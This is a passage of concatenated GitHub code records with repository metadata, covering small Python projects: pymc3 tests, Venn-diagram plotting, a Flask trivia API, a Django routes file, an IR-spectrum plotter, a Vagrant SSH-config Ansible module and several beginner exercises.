pytest.raises(ValueError):\n DocstringModel(name='prefix')\n\n def test_model_root(self):\n with pm.Model() as model:\n assert model is model.root\n with pm.Model() as sub:\n assert model is sub.root\n\n\nclass TestObserved(object):\n def test_observed_rv_fail(self):\n with pytest.raises(TypeError):\n with pm.Model():\n x = Normal('x')\n Normal('n', observed=x)\n\n\nclass TestTheanoConfig(object):\n def test_set_testval_raise(self):\n with theano.configparser.change_flags(compute_test_value='off'):\n with pm.Model():\n assert theano.config.compute_test_value == 'raise'\n assert theano.config.compute_test_value == 'off'\n\n def test_nested(self):\n with theano.configparser.change_flags(compute_test_value='off'):\n with pm.Model(theano_config={'compute_test_value': 'ignore'}):\n assert theano.config.compute_test_value == 'ignore'\n with pm.Model(theano_config={'compute_test_value': 'warn'}):\n assert theano.config.compute_test_value == 'warn'\n assert theano.config.compute_test_value == 'ignore'\n assert theano.config.compute_test_value == 'off'\n\ndef test_duplicate_vars():\n with pytest.raises(ValueError) as err:\n with pm.Model():\n pm.Normal('a')\n pm.Normal('a')\n err.match('already exists')\n\n with pytest.raises(ValueError) as err:\n with pm.Model():\n pm.Normal('a')\n pm.Normal('a', transform=transforms.log)\n err.match('already exists')\n\n with pytest.raises(ValueError) as err:\n with pm.Model():\n a = pm.Normal('a')\n pm.Potential('a', a**2)\n err.match('already exists')\n\n with pytest.raises(ValueError) as err:\n with pm.Model():\n pm.Binomial('a', 10, .5)\n pm.Normal('a', transform=transforms.log)\n err.match('already exists')","repo_name":"RhDm/pymc3","sub_path":"pymc3/tests/test_model.py","file_name":"test_model.py","file_ext":"py","file_size_in_byte":6147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"69"}
+{"seq_id":"7621904336","text":"import pandas as pd\r\nimport numpy as np\r\nfrom matplotlib_venn import venn3\r\n#超市\r\ndata_dwj=pd.read_csv('dwj_f_seq_len_count.csv')\r\n#商友\r\ndata_sd=pd.read_csv('sd_f_seq_len_count.csv')\r\ndata_bc = pd.read_csv(\"bc_303592.csv\")\r\ndata_sly = pd.read_csv(\"sly_16553.csv\")\r\ndata_yimei = pd.read_csv(\"yimei_mapping_seq_len_count.csv\")\r\ndata_potato = pd.read_csv(\"potato_mapping_seq_len_count.csv\")\r\n# 百货\r\n# data_baihuo=data_shangyou.loc[(data_shangyou['课室']!='超级市场课')|(data_shangyou['课室']!='生活美食课')]\r\n#餐饮\r\n# data_canyin=data_shangyou.loc[(data_shangyou['课室']=='生活美食课')|(data_shangyou['部类']=='B2F小型餐厅')|\r\n# (data_shangyou['部类']=='小型餐厅')|(data_shangyou['部类']=='美食档口')|\r\n# (data_shangyou['部类']=='甜品烘焙')|(data_shangyou['部类']=='休闲食品')]\r\n#非可视化计算交叉情况\r\n# print('超市',len(set(data_chaoshi['会员卡号'])))\r\n# print('百货',len(set(data_baihuo['会员卡号'])))\r\n# print('餐饮',len(set(data_canyin['会员卡号'])))\r\n# print('超市&百货',len(set(data_chaoshi['会员卡号'])&set(data_baihuo['会员卡号'])))\r\n# print('超市&餐饮',len(set(data_chaoshi['会员卡号'])&set(data_canyin['会员卡号'])))\r\n# print('百货&餐饮',len(set(data_canyin['会员卡号'])&set(data_baihuo['会员卡号'])))\r\n# print('超市&百货&餐饮',len(set(data_chaoshi['会员卡号'])&set(data_baihuo['会员卡号'])&set(data_canyin['会员卡号'])))\r\n# print('仅超市',len(set(data_chaoshi['会员卡号'])-set(data_baihuo['会员卡号'])-set(data_canyin['会员卡号'])))\r\n# print('仅百货',len(set(data_baihuo['会员卡号'])-set(data_chaoshi['会员卡号'])-set(data_canyin['会员卡号'])))\r\n# print('仅餐饮',len(set(data_canyin['会员卡号'])-set(data_baihuo['会员卡号'])-set(data_chaoshi['会员卡号'])))\r\n\r\n#开始绘制文氏图\r\nimport matplotlib.pyplot as plt\r\n# 设置中文显示\r\nplt.rcParams['font.sans-serif']='SimHei'\r\nplt.rcParams['axes.unicode_minus']=False\r\n\r\n\r\n\r\n# 导入库,注意没有安装的要先pip install matplotlib-venn\r\n\r\n# sub接受一个set组成的列表,set_labels接受名称列表,其他参数自行去查看啦\r\n# venn3(subsets=[set(data_chaoshi['会员卡号']),set(data_baihuo['会员卡号']),set(data_canyin['会员卡号'])],set_labels=['超市','百货','餐饮'],)\r\n# plt.show()\r\n\r\n# 如果是画两个集合的韦恩图,就以下代码,其他不变\r\nfig, axs = plt.subplots(1,3, figsize=(18,6),dpi=300)\r\nfrom matplotlib_venn import venn2, venn2_circles\r\nfont1 = {'family': 'Times New Roman',\r\n 'weight': 'normal',\r\n 'size': 50,\r\n }\r\ng1=venn2(subsets=[set(data_dwj['seq']),set(data_sd['seq'])],\r\n set_labels=(\"Mo\",\"Os\"),\r\n set_colors=(\"blue\",\"red\"),\r\n alpha=0.6,#透明度\r\n normalize_to=1.0,#venn图占据figure的比例,1.0为占满\r\n ax=axs[0],\r\n )\r\n\r\n# g1.get_label_by_id('01').set_fontsize(30)\r\n\r\n# axs[0].annotate('81200',\r\n# color='#098154',\r\n# xy=g1.get_label_by_id('10').get_position(),\r\n# xytext=(-120, 100),\r\n# ha='center', textcoords='offset points',\r\n# bbox=dict(boxstyle='round,pad=0.5', fc='#098154', alpha=0.6), # 注释文字底纹\r\n# arrowprops=dict(arrowstyle='-|>', connectionstyle='arc3,rad=0.5', color='#098154') # 箭头属性设置\r\n# )\r\n\r\nchi1=axs[0].annotate('4842',\r\n color='#c72e29',\r\n xy=g1.get_label_by_id('01').get_position() + np.array([0, 0.05]),\r\n xytext=(100, 150),\r\n ha='center', textcoords='offset points',\r\n bbox=dict(boxstyle='round,pad=0.5', fc='#c72e29', alpha=0.6),\r\n arrowprops=dict(arrowstyle='-|>', connectionstyle='arc3,rad=0.5', color='#c72e29')\r\n )\r\n\r\nchi2=axs[0].annotate('6099',\r\n color='black',\r\n xy=g1.get_label_by_id('11').get_position() + np.array([0, 0.05]),\r\n xytext=(-50, 150),\r\n ha='center', textcoords='offset points',\r\n bbox=dict(boxstyle='round,pad=0.5', fc='grey', alpha=0.6),\r\n arrowprops=dict(arrowstyle='-|>', connectionstyle='arc3,rad=-0.5', color='black')\r\n 
)\r\n\r\n\r\ng2=venn2(subsets=[set(data_bc['seq']),set(data_sly['seq'])],\r\n set_labels=(\"Bc\",\"Sly\"),\r\n set_colors=(\"blue\",\"red\"),\r\n alpha=0.6,\r\n normalize_to=1.0,\r\n ax=axs[1]\r\n )\r\n# axs[1].annotate('I like this green part!',\r\n# color='#098154',\r\n# xy=g2.get_label_by_id('10').get_position() - np.array([0, 0.05]),\r\n# xytext=(-80, 40),\r\n# ha='center', textcoords='offset points',\r\n# bbox=dict(boxstyle='round,pad=0.5', fc='#098154', alpha=0.6), # 注释文字底纹\r\n# arrowprops=dict(arrowstyle='-|>', connectionstyle='arc3,rad=0.5', color='#098154') # 箭头属性设置\r\n# )\r\n\r\nchi3=axs[1].annotate('8076',\r\n color='#c72e29',\r\n xy=g2.get_label_by_id('01').get_position() + np.array([0, 0.05]),\r\n xytext=(100, 150),\r\n ha='center', textcoords='offset points',\r\n bbox=dict(boxstyle='round,pad=0.5', fc='#c72e29', alpha=0.6),\r\n arrowprops=dict(arrowstyle='-|>', connectionstyle='arc3,rad=0.5', color='#c72e29')\r\n )\r\n\r\nchi4=axs[1].annotate('8477',\r\n color='black',\r\n xy=g2.get_label_by_id('11').get_position() + np.array([0, 0.05]),\r\n xytext=(-80, 150),\r\n weight= 50,\r\n ha='center', textcoords='offset points',\r\n bbox=dict(boxstyle='round,pad=0.5', fc='grey', alpha=0.6),\r\n arrowprops=dict(arrowstyle='-|>', connectionstyle='arc3,rad=-0.5', color='black')\r\n )\r\ng3=venn2(subsets=[set(data_yimei['seq']),set(data_potato['seq'])],\r\nset_labels=(\"Pi\",\"Po\"),\r\n set_colors=(\"blue\",\"red\"),\r\n alpha=0.6,\r\n normalize_to=1.0,\r\n ax=axs[2]\r\n )\r\n\r\n# axs[2].annotate('I like this green part!',\r\n# color='#098154',\r\n# xy=g3.get_label_by_id('10').get_position() - np.array([0, 0.05]),\r\n# xytext=(-80, 40),\r\n# ha='center', textcoords='offset points',\r\n# bbox=dict(boxstyle='round,pad=0.5', fc='#098154', alpha=0.6), # 注释文字底纹\r\n# arrowprops=dict(arrowstyle='-|>', connectionstyle='arc3,rad=0.5', color='#098154') # 箭头属性设置\r\n# )\r\n\r\nchi5=axs[2].annotate('63831',\r\n color='#c72e29',\r\n xy=g3.get_label_by_id('01').get_position() + np.array([0, 0.05]),\r\n xytext=(80, 150),\r\n weight = 'black',\r\n ha='center', textcoords='offset points',\r\n bbox=dict(boxstyle='round,pad=0.5', fc='#c72e29', alpha=0.6),\r\n arrowprops=dict(arrowstyle='-|>', connectionstyle='arc3,rad=0.5', color='#c72e29')\r\n )\r\n\r\nchi6=axs[2].annotate('23237',\r\n color='black',\r\n xy=g3.get_label_by_id('11').get_position() + np.array([0, 0.05]),\r\n xytext=(-60, 150),\r\n ha='center', textcoords='offset points',\r\n bbox=dict(boxstyle='round,pad=0.5', fc='grey', alpha=0.6),\r\n arrowprops=dict(arrowstyle='-|>', connectionstyle='arc3,rad=-0.5', color='black')\r\n )\r\nchi1.set_fontsize(40)\r\nchi2.set_fontsize(40)\r\nchi3.set_fontsize(40)\r\nchi4.set_fontsize(40)\r\nchi5.set_fontsize(40)\r\nchi6.set_fontsize(40)\r\n# plt.subplots_adjust(left=0.1, bottom=0.5, right=0.8, wspace=0.01)\r\n# legend = plt.figlegend(prop=font1)\r\n# axs.set_labels( fontsize =15)\r\ng1.get_label_by_id('10').set_fontsize(40)#1的大小设置为20\r\ng2.get_label_by_id('10').set_fontsize(40)#1的大小设置为20\r\ng3.get_label_by_id('10').set_fontsize(40)#1的大小设��为20\r\n\r\nfor text in g1.set_labels:\r\n text.set_fontsize(40)\r\nfor text in g2.set_labels:\r\n text.set_fontsize(40)\r\nfor text in g3.set_labels:\r\n text.set_fontsize(40)\r\n\r\n# plt.tight_layout(pad=0.5)\r\n\r\nplt.savefig(('713.png'), 
dpi=300)\r\nplt.show()\r\n\r\n\r\n","repo_name":"chijunxia/common-mechanism-of-fungal-sRNA","sub_path":"Code/preprocessing/Vens.py","file_name":"Vens.py","file_ext":"py","file_size_in_byte":8143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"23428564915","text":"\"\"\"\"def binaryAdd(a,b):\n carry=0\n result=\"\"\n a,b=list(a),list(b)\n while a or b or carry==1:\n if a:\n carry+=int(a.pop())\n if b:\n carry+=int(b.pop())\n result+=str(carry%2)\n carry=carry//2\n return result\n\n\na=\"11\"\nb=\"1\"\nprint(binaryAdd(a,b))\"\"\"\n\ndef MyApproach(a,b):\n carry=0 #This One Hold th value in top of addtion\n ListA=list(a)\n ListB=list(b)\n result=\"\"\n while ListA or ListB or carry==1:\n if ListA:\n carry+=int(ListA.pop())\n if ListB: \n carry+=int(ListB.pop())\n \n result+=str(carry%2)\n carry=carry//2\n print(result[::-1])\n \na=\"11\"\nb=\"1\"\nMyApproach(a,b)","repo_name":"HussainPythonista/Leetcode-Prblems","sub_path":"BinaryAdd.py","file_name":"BinaryAdd.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"28939325691","text":"from django.urls import path\nfrom .views import *\nfrom django.contrib.staticfiles.urls import staticfiles_urlpatterns\n\nurlpatterns = [\n path('', index, name='index'),\n path(\"Reservation\", reservation, name='reservation'),\n path(\"Contact\", contact, name='contact'),\n path(\"Blog\", blog, name='blog'),\n path(\"About\", about, name='about'),\n path(\"hotels\", hotels, name='hotels'),\n path(\"hotel\", hotel, name='hotel'),\n]\nurlpatterns += staticfiles_urlpatterns()\n","repo_name":"saeedsrm/HotelBooking","sub_path":"home/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"10070616593","text":"#!/usr/bin/python3\n\n# This script adapted (with permission) from the script \"PlotBand\", a script by J. Grant Hill.\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport cclib\nimport argparse\nimport lineshapes\n\n\n# Set up argument parsing\nparser = argparse.ArgumentParser(description=\"This script uses cclib to extract a Lorentzian broadened IR spectrum from a Gaussian 09 calculation\")\nparser.add_argument(\"-i\", dest=\"file\", metavar=\"file\", help=\"input Gaussian 09 frequency calculation\", required=True)\nparser.add_argument(\"-f\", dest=\"fwhm\", metavar=\"fwhm\", help=\"the FWHM in cm-1 of the desired Lorentzians. Default: 6 cm-1\", type=int, required=False, default=6)\nparser.add_argument(\"-b\", dest=\"begin\", metavar=\"begin\", help=\"beginning (in cm-1) of plot. Default: 0 cm-1\", type=int, required=False, default=0)\nparser.add_argument(\"-e\", dest=\"end\", metavar=\"end\", help=\"end (in cm-1) of plot. Default: 4000 cm-1\", type=int, required=False, default=4000)\nparser.add_argument(\"-p\", dest=\"points\", metavar=\"points\", help=\"number of points in plot. Default: 8000\", type=int, required=False, default=8000)\nparser.add_argument(\"-s\", dest=\"save\", metavar=\"save\", help=\"file in which output will be save (optional)\", required=False, default=None)\nparser.add_argument(\"-q\", dest=\"quiet\", metavar=\"quiet\", help=\"by default a matplotlib window will appear, use -q True to prevent this\", required=False, default=None)\nargs = vars(parser.parse_args())\n\n# Parse the file using cclib\nincoming = cclib.parser.ccopen(args[\"file\"])\nparsedfile = incoming.parse()\n\n# Create the x axis using the settings\nx = np.linspace(args[\"begin\"], args[\"end\"], args[\"points\"])\n\n# Make the Lorentzians and add them together\ncomposite = 0\nfor count, peak in enumerate(parsedfile.vibfreqs):\n thispeak = lineshapes.IRLorentzian(x, peak, parsedfile.vibirs[count], args[\"fwhm\"])\n composite += thispeak\n\n# If saving has been asked for\nif args[\"save\"] is not None:\n with open(args[\"save\"], 'w') as csv:\n # Print a pre-amble so that csv is human readable\n csv.write(\"# Extracted & convoluted IR spectrum, with Lorentzian lineshapes, FWHM = {} cm-1\\n\".format(args[\"fwhm\"]))\n csv.write(\"# x / cm-1; epsilon / L mol-1 cm-1; vib. freq. 
/ cm-1; intensity / km mol-1\\n\")\n for each in range(max(len(x), len(parsedfile.vibfreqs))):\n try:\n csv.write(\"{},{},{},{}\\n\".format(x[each], composite[each], parsedfile.vibfreqs[each], parsedfile.vibirs[each]))\n except IndexError:\n if len(x) > len(parsedfile.vibfreqs):\n csv.write(\"{},{}\\n\".format(x[each], composite[each]))\n else:\n csv.write(\"{},{}\\n\".format(parsedfile.vibfreqs[each], parsedfile.vibirs[each]))\n\n# If not in quiet mode\nif args[\"quiet\"] is None:\n # Set up the plot\n fig, ax1 = plt.subplots()\n # Axis 1 is the convoluted IR spectrum\n ax1.plot(x, composite)\n plt.xlabel('Frequency / cm$^{-1}$')\n ax1.set_ylabel('Molar absorption coefficient, $\\epsilon$ / L mol$^{-1}$ cm$^{-1}$')\n # Axis 2 is the stick spectrum, which shares the x axis\n ax2 = ax1.twinx()\n ax2.vlines(parsedfile.vibfreqs, 0, parsedfile.vibirs)\n ax2.set_ylabel('IR intensity / km mol$^{-1}$')\n # Change formatting and plot\n fig.tight_layout()\n plt.show()\n","repo_name":"theochemtheo/chemscripts","sub_path":"G09-EXTRACT_Lorentzian-IR.py","file_name":"G09-EXTRACT_Lorentzian-IR.py","file_ext":"py","file_size_in_byte":3312,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"10583976257","text":"import os\nfrom flask import Flask, request, abort, jsonify\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_cors import CORS\nimport random\n\nfrom models import setup_db, Question, Category\n\nQUESTIONS_PER_PAGE = 10\n\n\ndef get_paginated_questions(request, questions, num_of_questions):\n page = request.args.get('page', 1, type=int)\n start = (page - 1) * num_of_questions\n end = start + num_of_questions\n\n questions = [question.format() for question in questions]\n current_questions = questions[start:end]\n\n return current_questions\n\n\ndef create_app(test_config=None):\n # create and configure the app\n app = Flask(__name__)\n setup_db(app)\n\n CORS(app, resources={'/': {'origins': '*'}})\n\n def after_request(response):\n response.headers.add('Access-Control-Allow-Headers',\n 'Content-Type,Authorization,true')\n response.headers.add('Access-Control-Allow-Methods',\n 'GET,PATCH,POST,DELETE,OPTIONS')\n return response\n\n @app.route('/categories')\n def get_all_categories():\n\n # This endpoint returns all categories\n\n try:\n categories = Category.query.all()\n category_dict = {}\n for category in categories:\n category_dict[category.id] = category.type\n\n return jsonify({\n 'success': True,\n 'categories': category_dict\n }), 200\n except Exception:\n abort(500)\n\n @app.route('/questions')\n def get_questions():\n # get paginated questions and categories\n questions = Question.query.order_by(Question.id).all()\n total_questions = len(questions)\n categories = Category.query.order_by(Category.id).all()\n\n current_questions = get_paginated_questions(\n request, questions,\n QUESTIONS_PER_PAGE)\n\n if (len(current_questions) == 0):\n abort(404)\n\n category_dict = {}\n for category in categories:\n category_dict[category.id] = category.type\n\n return jsonify({\n 'success': True,\n 'total_questions': total_questions,\n 'categories': category_dict,\n 'questions': current_questions\n }), 200\n\n @app.route('/questions/', methods=['DELETE'])\n def delete_question(id):\n try:\n question = Question.query.get(id)\n question.delete()\n\n return jsonify({\n 'success': True,\n 'message': \"Question successfully deleted\"\n }), 200\n except Exception:\n abort(422)\n\n @app.route('/questions', methods=['POST'])\n def create_question():\n # Get data from request\n data = request.get_json()\n\n question = data.get('question', '')\n answer = data.get('answer', '')\n difficulty = data.get('difficulty', '')\n category = data.get('category', '')\n\n # if data is empty abort with 400\n if ((question == '') or (answer == '')\n or (difficulty == '') or (category == '')):\n abort(400)\n\n try:\n # Create a new question instance\n question = Question(\n question=question,\n answer=answer,\n difficulty=difficulty,\n category=category)\n\n # save question\n question.insert()\n\n # return success message\n return jsonify({\n 'success': True,\n 'message': 'Question created!'\n }), 201\n\n except Exception:\n abort(500)\n\n @app.route('/questions/search', methods=['POST'])\n def search_questions():\n data = request.get_json()\n search_term = data.get('searchTerm', '')\n\n # if empty return 400 bad request\n if search_term == '':\n abort(400)\n\n try:\n questions = Question.query.filter(\n Question.question.ilike(f'%{search_term}%')).all()\n\n # if there are no questions for search term return 404\n if len(questions) == 0:\n abort(404)\n\n # paginate questions\n paginated_questions = get_paginated_questions(\n request, questions,\n QUESTIONS_PER_PAGE)\n\n # return 
response if successful\n return jsonify({\n 'success': True,\n 'questions': paginated_questions,\n 'total_questions': len(Question.query.all())\n }), 200\n\n except Exception:\n # This error code is returned when 404 abort\n # raises exception from try block\n abort(404)\n\n @app.route('/categories//questions')\n def get_questions_by_category(id):\n \"\"\"This endpoint handles getting questions by category\"\"\"\n\n # get the category by id\n category = Category.query.filter_by(id=id).one_or_none()\n\n # abort 400 for bad request if category isn't found\n if (category is None):\n abort(422)\n\n questions = Question.query.filter_by(category=id).all()\n\n # paginate questions\n paginated_questions = get_paginated_questions(\n request, questions,\n QUESTIONS_PER_PAGE)\n\n # return the results\n return jsonify({\n 'success': True,\n 'questions': paginated_questions,\n 'total_questions': len(questions),\n 'current_category': category.type\n })\n\n @app.route('/quizzes', methods=['POST'])\n def play_quiz_question():\n \"\"\"This returns a random question to play quiz.\"\"\"\n\n # process the request data and get the values\n data = request.get_json()\n previous_questions = data.get('previous_questions')\n quiz_category = data.get('quiz_category')\n\n # return 404 if quiz_category or previous_questions is empty\n if ((quiz_category is None) or (previous_questions is None)):\n abort(400)\n\n # if default value of category is given return all questions\n # else return questions filtered by category\n if (quiz_category['id'] == 0):\n questions = Question.query.all()\n else:\n questions = Question.query.filter_by(\n category=quiz_category['id']).all()\n\n # defines a random question generator method\n def get_random_question():\n return questions[random.randint(0, len(questions)-1)]\n\n # get random question for the next question\n next_question = get_random_question()\n\n # defines boolean used to check that the question\n # is not a previous question\n found = True\n\n while found:\n if next_question.id in previous_questions:\n next_question = get_random_question()\n else:\n found = False\n\n return jsonify({\n 'success': True,\n 'question': next_question.format(),\n }), 200\n\n @app.errorhandler(400)\n def bad_request(error):\n return jsonify({\n 'success': False,\n 'error': 400,\n 'message': 'Bad request'\n }), 400\n\n # Error handler for resource not found (404)\n @app.errorhandler(404)\n def not_found(error):\n return jsonify({\n 'success': False,\n 'error': 404,\n 'message': 'Resource not found'\n }), 404\n\n # Error handler for internal server error (500)\n @app.errorhandler(500)\n def internal_server_error(error):\n return jsonify({\n 'success': False,\n 'error': 500,\n 'message': 'internal server error'\n }), 500\n\n # Error handler for unprocesable entity (422)\n @app.errorhandler(422)\n def unprocesable_entity(error):\n return jsonify({\n 'success': False,\n 'error': 422,\n 'message': 'Unprocessable entity'\n }), 422\n\n return app\n","repo_name":"pranavswaroopreddy/Trivia-api","sub_path":"backend/flaskr/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":7991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"652084741","text":"from flask import Flask, request, jsonify\nimport requests\n\napp2 = Flask(__name__)\n\ncpt1 = 0\ncpt2 = 0\n\n#Envoie de mon adresse au serveur 3 \nmy_adress = \"http://localhost:5372\"\nserver3_adress = \"http://localhost:8080/adresse2\"\ndata3 = {\"adress2\" : my_adress}\nr2 = requests.post(server3_adress, json=data3)\n\n@app2.route(\"/\", methods=[\"GET\"])\ndef start():\n return \"Acceuil Serveur 2\"\n\n#Fonction qui récupere l'adresse du serveur 1 depuis le serveur 3 et\n@app2.route(\"/pong\", methods=[\"GET\"])\ndef ping():\n server1 = requests.get(\"http://localhost:8080/send_adresse1\")\n requests.get(server1.text+\"/pong\")\n return \"ping sent\" \n\n\"\"\"\n@app2.route(\"/test\", methods=[\"GET\"])\ndef voircpt():\n tmp = requests.get(\"http://localhost:4567/cpt1\")\n print(\"tmp = \", tmp.text)\n print(\"type tmp = \" , type(tmp.text))\n print(\"type tmp int = \" , type(int(tmp.text)))\n print(\"tmp en int = \" , int(tmp.text))\n return \"voircpt\"\n\"\"\"\n\nif __name__ == '__main__':\n app2.run(host='serveur2', port=5372)\n \n\n\n","repo_name":"HugoMendes16/icvad","sub_path":"exo2/serv2.py","file_name":"serv2.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"19548791308","text":"\nnumero= int(input(\"¿Qué número quieres saber si es primo? \"))\nvalor= range(2,numero)\ncontador = 0\n\nfor n in valor:\n if numero % n == 0:\n contador +=1\n print(\"divisor:\", n)\n\nif contador > 0 :\n print(\"El número no es primo\" )\nelse:\n print(\"El nÚmero es primo\") \n\n\n\ndef primo(num):\n if num < 2: #si es menor de 2 no es primo, devolverá Falso\n return False\n \n for i in range(2, num): #un ciclo desde el 2 hasta el num de entrada\n if num % i == 0: #si el resto da 0 no es primo, devuelve Falso\n return False\n return True #de lo contrario devuelve Verdadero\n\nnumero= int(input(\"¿Qué número quieres saber si es primo? \"))\nrespuesta=primo(numero)\nprint(respuesta)","repo_name":"mecomontes/Python","sub_path":"Desde0/NumeroPrimo.py","file_name":"NumeroPrimo.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"42210161049","text":"# def word(filename, x):\n# result = ''\n# index = 0\n# count = 0\n# wordfile = open(filename)\n# wordfile = wordfile.readline().split()\n# while index < len(wordfile):\n# if wordfile[index] == x:\n# count += 1\n# result += wordfile[index] + ' ' + str(count)\n# index += 1\n# return result\n# \n# print(word('fishy.txt', 'One'))\n\n# def numbers(filename):\n# result = ''\n# index = 0\n# wordfile = open(filename)\n# wordfile = list(str(wordfile.readline()))\n# while index < len(wordfile):\n# result += wordfile[index] + ' '\n# index += 1\n# return result\n# \n# print(numbers('id_file.txt'))\n\ndef print_powers(n, high):\n result = ''\n count = 0\n while count <= high:\n result += str(count * n) + ' '\n count += 1\n print(result)\n\n\ndef print_powers_table(high):\n row = 1\n while row <= high:\n print_powers(row, high)\n row += 1\n \nprint_powers_table(3)\n\n# def is_prime(n):\n# if n > 1:\n# for i in range(2,n):\n# if (n % i) == 0: \n# return 'not a prime number'\n# break\n# else: \n# return n\n\n# def number_of_prime_numbers(x):\n# index = 0\n# result = ''\n# while index <= 10:\n# is_prime(x)\n# result += str(index)\n# index += 1\n# return result\n# \n# print(number_of_prime_numbers(10))","repo_name":"Ben-Stacey/Comp150","sub_path":"Lab 11/Lab 11.py","file_name":"Lab 11.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"20742422485","text":"#!/usr/bin/python\n\n\nimport json\nimport os\nimport sys\n\nfrom sh import vagrant\n\n\ndef split_args(args):\n newargs = {}\n for kv in args.split():\n parts = kv.split('=', 1)\n try:\n newargs[parts[0]] = parts[1]\n except IndexError:\n pass\n return newargs\n\n\ndef split_ssh_config(raw):\n if isinstance(raw, bytes):\n raw = raw.decode('utf-8')\n ssh_config = {}\n for line in raw.split('\\n'): \n line = line.strip()\n parts = line.split(None, 1)\n try:\n ssh_config[parts[0]] = parts[1].strip()\n except IndexError:\n pass\n return ssh_config\n\n\ndef main():\n \n results = {\n 'argv': sys.argv[:],\n 'changed': False,\n 'stdin': sys.stdin.read(),\n #'env': dict(os.environ)\n }\n\n argfile = sys.argv[1]\n with open(argfile, 'r') as f:\n args = f.read()\n args = split_args(args)\n results['args'] = args\n\n assert 'boxpath' in args, 'args must contain a boxpath'\n\n boxpath = args['boxpath']\n boxpath = boxpath.replace(\"'\", \"\")\n boxpath = boxpath.replace('\"', \"\")\n boxpath = os.path.expanduser(boxpath)\n boxpath = os.path.abspath(boxpath)\n pid = vagrant('ssh-config', _cwd=boxpath)\n pid.wait()\n results['ssh_config'] = split_ssh_config(pid.stdout)\n\n print(json.dumps(results)) \n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"jctanner/ansible-tools","sub_path":"vagrant/ansible_test_inventory/playbooks/roles/tower_master/library/vagrant_box_ssh_config.py","file_name":"vagrant_box_ssh_config.py","file_ext":"py","file_size_in_byte":1391,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"70"}
+{"seq_id":"22819691517","text":"# Uses python3\nimport sys\n\ndef optimal_summands(n):\n summands, i = [], 1\n for i in range(1, n + 1):\n if (i == n) or (2*i + 1 <= n):\n summands.append(i)\n n -= i\n if n == 0: return summands\n return summands\n\nif __name__ == '__main__':\n input = sys.stdin.read()\n n = int(input)\n summands = optimal_summands(n)\n print(len(summands))\n for x in summands:\n print(x, end=' ')\n","repo_name":"bmharris626/coursera-algorithmic-toolbox","sub_path":"02_greedy_algorithms_submitted_answers/different_summands.py","file_name":"different_summands.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"1221614268","text":"import psycopg2\nimport numpy as np\nfrom psycopg2.extensions import register_adapter, AsIs\npsycopg2.extensions.register_adapter(np.int64, psycopg2._psycopg.AsIs)\n\ndef reshape(rawdata, length):\n data = []\n for e in range(len(rawdata)) :\n data.append([])\n for i in range(length):\n data[-1].append(rawdata[e][i])\n return data\n\nps_connection = psycopg2.connect(dbname=\"immo\", user=\"root\", password=\"occulto\", host=\"db\")\ncursor = ps_connection.cursor()\ncursor.execute(\"CREATE TABLE IF NOT EXISTS immo(id SERIAL PRIMARY KEY, type VARCHAR(12), surface REAL, pieces SMALLINT, chambres SMALLINT, loyer SMALLINT, meuble BOOLEAN, jardin BOOLEAN, terrasse BOOLEAN, dist_centre SMALLINT, dist_transport SMALLINT, dist_commerce SMALLINT);\")\n\ncursor.execute(\"SELECT COUNT(*) FROM immo;\")\nif cursor.fetchall()[0][0] == 0 :\n\n gendata = np.genfromtxt(\"db.csv\", delimiter=\";\", dtype='S12, f8, i8, i8, i8, i8, i8, i8, i8, i8, i8')\n\n data = reshape(gendata, 11)\n\n for D in data :\n if D[0] == b'Appartement' :\n D[0] = 'Appartement'\n elif D[0] == b'Maison' :\n D[0] = 'Maison'\n else : D[0] = 'Studio'\n for k in [5, 6, 7] :\n D[k] = True if D[k] == 1 else False\n\n cursor.execute(\"INSERT INTO immo (type, surface, pieces, chambres, loyer, meuble, jardin, terrasse, dist_centre, dist_transport, dist_commerce) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s);\", D)\n \n print(\"Database filled from data/db.csv\")\n\nelse : print(\"Database ready\")\n\nps_connection.commit()\n","repo_name":"7evy/Fuzzy_Queries","sub_path":"web_app/fill_db.py","file_name":"fill_db.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"15295167107","text":"#!/usr/bin/env python3\nimport collections\nfrom fuzzywuzzy import fuzz\nfrom google import google\nimport logging\nimport operator\nimport re\nimport requests\nimport termcolor\nimport webbrowser\n\nlogging.basicConfig(format='(%(levelname)s) %(message)s', level=logging.INFO)\nkInversionWords = [\"not\"]\n\n\nclass WebQuery:\n\n def __init__(self):\n self.results = []\n self.logger = logging.getLogger(self.__class__.__name__)\n self.inversion = False\n\n def search_google(self, query, pages=3, print_results=False):\n \"\"\"Query google for search results\n Args:\n query (String): to send to google\n pages (Number): of pages to parse from google result\n Returns:\n (Bool): On Success or failure\n \"\"\"\n self.query = query\n self.inversion = False\n # check for inversion language and mark it if found\n colored_query = query.split(\" \")\n query_without_inversion = query.split(\" \")\n for i, word in enumerate(colored_query):\n for inversion in kInversionWords:\n if inversion in word.lower():\n self.inversion = True\n colored_query[i] = termcolor.colored(\n colored_query[i], \"red\")\n 